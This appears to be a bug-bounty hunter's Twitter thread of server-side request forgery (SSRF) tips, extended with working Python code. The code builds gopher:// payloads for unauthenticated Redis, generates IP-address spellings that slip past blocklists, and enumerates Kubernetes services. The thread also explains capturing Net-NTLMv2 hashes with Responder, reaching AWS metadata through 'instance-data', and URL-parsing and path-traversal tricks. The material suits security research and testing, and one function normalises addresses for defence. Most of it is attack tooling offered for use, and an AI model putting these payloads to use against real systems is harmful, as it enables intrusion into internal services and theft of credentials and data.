Corben Leo (@hacker_)
Aug 24 · Twitter thread, 13 tweets
I've made $500k+ from SSRF vulnerabilities.

Here are my tricks:
1. Try other URL schemes:

• file:// (file read)
• netdoc:// (file read; Java's netdoc: handler falls back to reading local files)
• dict://
• gopher://
• jar://
• ldap://
• and more!

Which schemes work depends on the HTTP client behind the SSRF: curl/libcurl (when built with them) speaks dict://, gopher://, ldap:// and file://, Java's java.net.URL understands file:, jar: and netdoc:, and most other clients only speak http(s). Fingerprint the client first (User-Agent of the incoming request, error messages), then test the schemes it actually supports.

You might be able to get file read.

Or, with gopher://, send arbitrary multi-line TCP payloads to internal services to gain additional impact.

(Ex: gopher + an unauthenticated Redis = likely RCE)
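As an added example (not code from the original thread), this is how the gopher:// payload for the Redis case above is built. It assumes the SSRF is performed by curl/libcurl with gopher support and that an unauthenticated Redis listens on a hypothetical 127.0.0.1:6379; the commands shown are benign reconnaissance, but the encoding is the same for any command.

```python
from urllib.parse import quote


def resp_encode(*args: str) -> bytes:
    """Encode one command in the Redis RESP protocol as an array of bulk strings.
    ("CONFIG", "GET", "dir") -> b"*3\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nGET\\r\\n$3\\r\\ndir\\r\\n"
    The bulk-string form is used instead of inline commands so that arguments
    containing spaces or newlines (e.g. file contents) need no quoting."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(b"$" + str(len(b)).encode() + b"\r\n" + b + b"\r\n")
    return b"".join(out)


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Wrap raw bytes in a gopher:// URL.

    curl treats the first character after the '/' as the Gopher item type and
    strips it (the '_' below is the conventional dummy), then writes the rest of
    the selector to the socket verbatim followed by CRLF. Every byte is
    percent-encoded so the CR/LF framing survives URL parsing in the
    vulnerable application."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def redis_gopher_url(host: str, port: int, *commands: tuple) -> str:
    """Chain several Redis commands into one gopher:// URL; Redis pipelines them
    and answers each in turn."""
    return gopher_url(host, port, b"".join(resp_encode(*c) for c in commands))


if __name__ == "__main__":
    # Hypothetical internal Redis; PING and CONFIG GET dir are safe probes that
    # confirm the bytes reach Redis before anything more aggressive is tried.
    print(redis_gopher_url("127.0.0.1", 6379, ("PING",), ("CONFIG", "GET", "dir")))
```

If the application URL-decodes the parameter once before handing it to curl, percent-encode the result a second time; a Redis that answers `+PONG` in the reflected response confirms the payload arrived intact.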
2. Is the target running Windows?

Can't hit internal services?

(Well, try this even if you can)

Try to capture Net-NTLMv2 authentication with Responder: point the SSRF at a host you control where Responder answers the request with an NTLM challenge. If the server-side HTTP client performs integrated Windows authentication (for example a .NET client configured to send default credentials), it authenticates to you as the service account, and the captured challenge/response can be cracked offline or relayed.

/vulnerable?url=http://your-responder-host
3. Try alternative representations of IP addresses.

IPs can be represented in many ways including:

• octal (0177.0.0.1)
• decimal (2130706433)
• hexadecimal (0x7f000001)
• shortened dotted forms (127.1)
• IPv6-mapped IPv4 ([::ffff:127.0.0.1])
• etc.

Try different representations: filters usually compare strings, while the socket layer (inet_aton and friends) happily parses all of the above as 127.0.0.1.

You might get lucky.
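As an added example (not from the original thread), the block below generates the alternative spellings listed above and shows why a string-based blocklist misses them. The parser reproduces the lenient inet_aton() grammar in pure Python so the result does not depend on the platform's C library; the blocklist and the 169.254.169.254 target are illustrative assumptions.

```python
import ipaddress
import re

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*")


def parse_legacy_ipv4(text: str):
    """Parse an IPv4 literal the way BSD/glibc inet_aton() does, which is what
    many socket layers use after URL validation has already passed:
      a.b.c.d, a.b.c, a.b, a   (the last part fills the remaining bytes)
      each part may be decimal, 0-prefixed octal or 0x-prefixed hex.
    Returns the 32-bit value, or None if inet_aton() would reject the text."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if _HEX.fullmatch(p):
            nums.append(int(p[2:], 16))
        elif _OCT.fullmatch(p):
            nums.append(int(p, 8))
        elif _DEC.fullmatch(p):
            nums.append(int(p))
        else:
            return None
    *head, last = nums
    if any(n > 0xFF for n in head) or last >= 1 << (8 * (4 - len(head))):
        return None
    value = 0
    for n in head:
        value = (value << 8) | n
    return (value << (8 * (4 - len(head)))) | last


def alt_forms(dotted: str) -> dict:
    """Equivalent spellings of a dotted-quad address to try against a filter."""
    n = int(ipaddress.IPv4Address(dotted))
    a, b, c, d = n.to_bytes(4, "big")
    forms = {
        "decimal": str(n),
        "hex": f"0x{n:08x}",
        "dotted-octal": ".".join(f"0{o:o}" for o in (a, b, c, d)),
        "dotted-hex": ".".join(f"0x{o:02x}" for o in (a, b, c, d)),
        "ipv6-mapped": f"[::ffff:{dotted}]",
    }
    if b == 0 and c == 0:
        forms["short"] = f"{a}.{d}"  # inet_aton: "127.1" == 127.0.0.1
    return forms


# Hypothetical blocklist of the kind that alternative representations slip past.
BLOCKLIST = {"127.0.0.1", "localhost", "169.254.169.254"}


def naive_is_blocked(host: str) -> bool:
    return host in BLOCKLIST


def is_internal(host: str):
    """Normalise first, then decide. Returns True/False for IP literals and None
    for hostnames, which must be resolved (and the resolved address re-checked,
    ideally at connect time to defeat DNS rebinding) before fetching."""
    h = host.strip("[]")
    n = parse_legacy_ipv4(h)
    if n is not None:
        ip = ipaddress.IPv4Address(n)
    else:
        try:
            ip = ipaddress.ip_address(h)
        except ValueError:
            return None
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_unspecified or ip.is_multicast)


if __name__ == "__main__":
    for target in ("127.0.0.1", "169.254.169.254"):
        for kind, form in alt_forms(target).items():
            print(f"{target} as {kind:13} {form:22} blocked={naive_is_blocked(form)!s:5} internal={is_internal(form)}")
```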
4. Can't hit 169.254.169.254?

On AWS, "instance-data" (and instance-data.ec2.internal) resolves to the metadata server through the VPC resolver, so a filter that only blocks the literal IP misses it.

Try hitting http://instance-data instead.

Caveat: if the instance enforces IMDSv2, a plain GET returns nothing useful. IMDSv2 needs a PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header, and then that token in an X-aws-ec2-metadata-token header on every GET, with a default hop limit of 1. An SSRF that only lets you choose the URL, not the method and headers, will not get there.
5. Know your target's technologies.

Look at job postings!

You might not be able to hit a metadata service.

But there are likely other internal services!

(ex: I've pulled data from an internal Elasticsearch instance)
6. Are they using Kubernetes?

Search Burp history for ".default.svc" or ".cluster.local"

If you find references, try to hit them.

Also, try to hit the Kubernetes API: https://kubernetes.default.svc

Even without credentials, a 401/403 response whose JSON body has "kind": "Status" tells you the SSRF reached the API server.
7. In Kubernetes, services get DNS names of the form:

<service>.<namespace>.svc.cluster.local

(cluster.local is the default cluster domain; some clusters use a different one), so you should be brute-forcing both the service name and the namespace.

I often use Burp Intruder: FUZZ.default.svc.cluster.local

Need better wordlists?

Scrape Helm chart names from ArtifactHub: charts typically name their Services after the chart or release, so they make a good FUZZ list.
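As an added example (not from the original thread), this block covers the two steps above: it pulls service/namespace references out of captured traffic and builds the FUZZ.<namespace>.svc.cluster.local candidate list for an Intruder-style sweep. The captured responses are constructed samples standing in for a Burp history export, and the chart names are illustrative.

```python
import re
from itertools import product

# Constructed sample of proxied response bodies (stand-in for a Burp history export).
SAMPLE_RESPONSES = [
    'var cfg = {"search": "http://search-api.default.svc.cluster.local:9200/"};',
    "Error: dial tcp: lookup billing.payments.svc: no such host",
    '{"upstream": "https://auth.default.svc/oauth/token"}',
    "<html>nothing internal here</html>",
]

# <service>.<namespace>.svc with an optional .cluster.local suffix.
CLUSTER_REF = re.compile(r"\b([a-z0-9-]+)\.([a-z0-9-]+)\.svc(?:\.cluster\.local)?\b")


def extract_cluster_refs(texts) -> set:
    """Return the (service, namespace) pairs referenced anywhere in captured traffic.
    Leaked error messages are as useful as config blobs: 'lookup x.y.svc' in a
    Go dial error names both the service and the namespace."""
    found = set()
    for text in texts:
        for svc, ns in CLUSTER_REF.findall(text):
            found.add((svc, ns))
    return found


def candidate_urls(names, namespaces=("default",), ports=(80, 8080, 443),
                   cluster_domain="cluster.local") -> list:
    """Build the FUZZ.<ns>.svc.<cluster_domain> list; one URL per name/namespace/port."""
    urls = []
    for name, ns, port in product(names, namespaces, ports):
        scheme = "https" if port == 443 else "http"
        urls.append(f"{scheme}://{name}.{ns}.svc.{cluster_domain}:{port}/")
    return urls


def wordlist_from_chart_names(chart_names) -> list:
    """Helm charts typically name their Services after the chart or release, so
    chart names scraped from ArtifactHub make a useful FUZZ wordlist. Normalise
    them to valid DNS labels and add the first token ("kube" from
    "kube-prometheus-stack") since releases are often named that way."""
    words = set()
    for name in chart_names:
        label = re.sub(r"[^a-z0-9-]", "-", name.lower()).strip("-")
        if label:
            words.add(label)
            words.add(label.split("-")[0])
    return sorted(words)


if __name__ == "__main__":
    refs = extract_cluster_refs(SAMPLE_RESPONSES)
    print("referenced:", sorted(refs))
    namespaces = sorted({ns for _, ns in refs} | {"default"})
    words = wordlist_from_chart_names(["kube-prometheus-stack", "Redis", "elasticsearch"])
    for url in candidate_urls(words, namespaces, ports=(80, 8080, 9200)):
        print(url)
```

Feed the referenced pairs first (they are known to exist), then the generated list; in Intruder, sort on response length and time, since a name that resolves but refuses the connection usually looks different from one that does not resolve at all.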
8. Can't supply a full URL? You can still get SSRF!

If your input is used to build a URL, THINK.

Learn about URL structures.

The following 4 characters have led to many SSRFs, because each one ends one URL component and starts another (@ ends the userinfo, ? starts the query, # starts the fragment, ; starts a path parameter in some servers):

• @
• ?
• #
• ;

An example is in the picture: [image]
9. If your injection is down the path, traverse!

GET /vulnerable?id=1234

|> app fetches: http://some-api/api/v1/1234

GET /vulnerable?id=../../

|> app fetches: http://some-api/api/v1/../../

The upstream server (and most HTTP clients, curl included) collapse the dot segments, so the request lands at http://some-api/ and you can now reach any path on that host.

Find an open redirect on that host & you probably have full SSRF, since most clients follow redirects.

Or, at minimum, you can likely hit other internal endpoints.
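As an added example (not from the original thread) serving tips 8 and 9 together, this block shows what a standards-following URL parser does with each of those characters when the input is pasted into a URL template, why a string-prefix allowlist is beaten by @, and where a traversed path actually lands. The two templates, the allowlist and the sample values are hypothetical.

```python
import posixpath
from urllib.parse import urlsplit

# Hypothetical templates standing in for how an app might assemble its upstream URL.
HOST_TEMPLATE = "https://{v}.api.example.com/v1/data"  # input lands in the host
PATH_TEMPLATE = "https://api.example.com/v1/{v}"       # input lands in the path


def build_and_parse(template: str, value: str) -> dict:
    """Substitute the value the way naive string formatting does, then report what
    the parser (and therefore the HTTP client) makes of the result. '#' and '?'
    push the rest of the template into the fragment/query, so the host becomes
    whatever preceded them."""
    url = template.format(v=value)
    p = urlsplit(url)
    return {"url": url, "host": p.hostname, "path": p.path,
            "query": p.query, "fragment": p.fragment}


def passes_prefix_check(url: str, allowed_prefix: str = "https://api.example.com") -> bool:
    """A weak allowlist that compares the raw string instead of the parsed host:
    'https://api.example.com@evil.com/' passes, and '@' makes the real host evil.com."""
    return url.startswith(allowed_prefix)


def effective_path(base_path: str, injected: str) -> str:
    """The path the upstream server resolves once dot segments are removed
    (curl removes them before sending; servers remove them on receipt).
    An injected value starting with '/' discards the base path entirely."""
    return posixpath.normpath(posixpath.join(base_path, injected))


if __name__ == "__main__":
    for v in ("us-east", "evil.com/#", "evil.com/?", "evil.com:443/x#"):
        print(build_and_parse(HOST_TEMPLATE, v))
    sneaky = "https://api.example.com@evil.com/v1"
    print(passes_prefix_check(sneaky), "->", urlsplit(sneaky).hostname)
    for inj in ("1234", "../../", "../../admin", "/health"):
        print(PATH_TEMPLATE.format(v=inj), "resolves to path", effective_path("/v1/", inj))
```

The `;` case is parser-specific: Python keeps it as part of the path, while servlet containers treat `;` as the start of a path parameter (the old `;jsessionid=` convention), so the same input can select a different route on the backend than the front end validated.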
10. That's all I've got for you.

Context is king.

Use your brain.

Do some research.

Follow @hacker_ (and @boringmattress).

Also, check out some other tips that Justin (@boringmattress) covered last week.